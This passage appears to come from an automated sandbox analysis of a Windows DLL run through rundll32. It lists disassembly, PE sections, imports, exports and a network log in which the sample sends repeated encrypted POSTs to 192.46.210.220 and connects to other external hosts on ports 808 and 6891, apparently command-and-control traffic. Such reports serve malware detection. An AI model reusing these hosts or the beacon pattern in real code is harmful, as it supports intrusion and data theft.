                                                                                                          mov ecx, dword ptr [ebp+0Ch]
                                                                                                          ror eax, cl
                                                                                                          pop ebp
                                                                                                          ret
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          call 00007F29D8A2CE1Dh
                                                                                                          push eax
                                                                                                          call 00007F29D8A6DB27h
                                                                                                          add esp, 04h
                                                                                                          pop ebp
                                                                                                          ret
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          sub esp, 18h
                                                                                                          mov eax, dword ptr [ebp+00h]

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x1471900x6c.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1471fc0x28.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000x72b4.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x1431100x54.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1431680x40.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xc70000x184.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000xc5e2f0xc6000False0.442065922901data6.47812417301IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0xc70000x80aec0x80c00False0.534103837985data5.52053304248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0x1480000x13ba00x1800False0.1875DOS executable (block device driverpyright)3.99635070896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x15c0000x72b40x7400False0.710264008621data6.69742088731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          KERNEL32.dllGetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

                                                                                                          Exports

                                                                                                          NameOrdinalAddress
                                                                                                          Bluewing10x49eed0
                                                                                                          Earth20x49efd0
                                                                                                          Masterjust30x49eb20

                                                                                                          Network Behavior

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 28, 2021 05:08:23.587127924 CEST49755443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:23.587193012 CEST44349755192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:23.587308884 CEST49755443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:23.628237009 CEST49755443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:23.628289938 CEST44349755192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:24.132102013 CEST44349755192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:24.132194996 CEST49755443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:24.628134012 CEST49755443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:24.628150940 CEST44349755192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:24.628665924 CEST44349755192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:24.628750086 CEST49755443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:24.650583982 CEST49755443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:24.650691032 CEST49755443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:24.650763988 CEST44349755192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:25.214037895 CEST49756443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:25.214087009 CEST44349756192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:25.214216948 CEST49756443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:25.234369040 CEST49756443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:25.234405994 CEST44349756192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:25.341134071 CEST44349755192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:25.341248035 CEST49755443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:25.341255903 CEST44349755192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:25.341337919 CEST49755443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:25.720079899 CEST44349756192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:25.720237017 CEST49756443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:25.846638918 CEST49755443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:25.846676111 CEST44349755192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:26.093796968 CEST49756443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:26.093838930 CEST44349756192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:26.094422102 CEST44349756192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:26.094490051 CEST49756443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:26.098285913 CEST49756443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:26.098362923 CEST49756443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:26.098393917 CEST44349756192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:26.107218981 CEST49757808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:26.269653082 CEST80849757143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:26.269777060 CEST49757808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:26.271893024 CEST49757808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:26.434151888 CEST80849757143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:26.435821056 CEST80849757143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:26.435923100 CEST49757808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:26.786499023 CEST44349756192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:26.786601067 CEST44349756192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:26.786662102 CEST49756443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:26.786688089 CEST49756443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:27.136215925 CEST49756443192.168.2.6192.46.210.220
                                                                                                          Oct 28, 2021 05:08:27.136265993 CEST44349756192.46.210.220192.168.2.6
                                                                                                          Oct 28, 2021 05:08:27.601506948 CEST49759808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:27.761028051 CEST80849759143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:27.761152029 CEST49759808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:27.761826992 CEST49759808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:27.921247005 CEST80849759143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:27.923578978 CEST80849759143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:27.923691988 CEST49759808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:28.143737078 CEST49759808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:28.303423882 CEST80849759143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:28.304692030 CEST80849759143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:28.304866076 CEST49759808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:28.305793047 CEST49759808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:28.305999994 CEST49759808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:28.465115070 CEST80849759143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:28.465210915 CEST80849759143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:28.465295076 CEST80849759143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:28.465315104 CEST80849759143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:28.474778891 CEST49757808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:28.637160063 CEST80849757143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:28.637589931 CEST80849757143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:28.639054060 CEST49757808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:28.639812946 CEST49757808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:28.639934063 CEST49757808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:28.801919937 CEST80849757143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:28.801945925 CEST80849757143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:28.802067041 CEST80849757143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:28.802140951 CEST80849757143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:28.848161936 CEST80849759143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:28.848187923 CEST80849759143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:28.848352909 CEST49759808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:28.850565910 CEST49759808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:28.969569921 CEST497606891192.168.2.645.77.0.96
                                                                                                          Oct 28, 2021 05:08:29.009882927 CEST80849759143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:29.136071920 CEST68914976045.77.0.96192.168.2.6
                                                                                                          Oct 28, 2021 05:08:29.136519909 CEST497606891192.168.2.645.77.0.96
                                                                                                          Oct 28, 2021 05:08:29.137114048 CEST497606891192.168.2.645.77.0.96
                                                                                                          Oct 28, 2021 05:08:29.179935932 CEST80849757143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:29.179965019 CEST80849757143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:29.180011034 CEST49757808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:29.180037975 CEST49757808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:29.187211037 CEST49757808192.168.2.6143.244.140.214
                                                                                                          Oct 28, 2021 05:08:29.303211927 CEST68914976045.77.0.96192.168.2.6
                                                                                                          Oct 28, 2021 05:08:29.304634094 CEST68914976045.77.0.96192.168.2.6
                                                                                                          Oct 28, 2021 05:08:29.305033922 CEST497606891192.168.2.645.77.0.96
                                                                                                          Oct 28, 2021 05:08:29.317599058 CEST497606891192.168.2.645.77.0.96
                                                                                                          Oct 28, 2021 05:08:29.349332094 CEST80849757143.244.140.214192.168.2.6
                                                                                                          Oct 28, 2021 05:08:29.384613991 CEST497616891192.168.2.645.77.0.96
                                                                                                          Oct 28, 2021 05:08:29.484143019 CEST68914976045.77.0.96192.168.2.6
                                                                                                          Oct 28, 2021 05:08:29.485596895 CEST497606891192.168.2.645.77.0.96
                                                                                                          Oct 28, 2021 05:08:29.486136913 CEST497606891192.168.2.645.77.0.96
                                                                                                          Oct 28, 2021 05:08:29.486238956 CEST497606891192.168.2.645.77.0.96
                                                                                                          Oct 28, 2021 05:08:29.551003933 CEST68914976145.77.0.96192.168.2.6
                                                                                                          Oct 28, 2021 05:08:29.553086996 CEST497616891192.168.2.645.77.0.96

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • 192.46.210.220

                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          0192.168.2.649755192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:24 UTC0OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:24 UTC0OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:25 UTC4INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:25 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          1192.168.2.649756192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:26 UTC4OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:26 UTC5OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:26 UTC9INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:26 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          10192.168.2.649801192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:47 UTC49OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:47 UTC49OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:48 UTC59INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:48 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          11192.168.2.649803192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:48 UTC54OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:48 UTC54OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:48 UTC59INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:48 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          12192.168.2.649809192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:51 UTC59OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:51 UTC59OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:52 UTC69INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:52 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          13192.168.2.649811192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:52 UTC64OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:52 UTC64OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:52 UTC69INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:52 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          14192.168.2.649817192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:55 UTC69OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
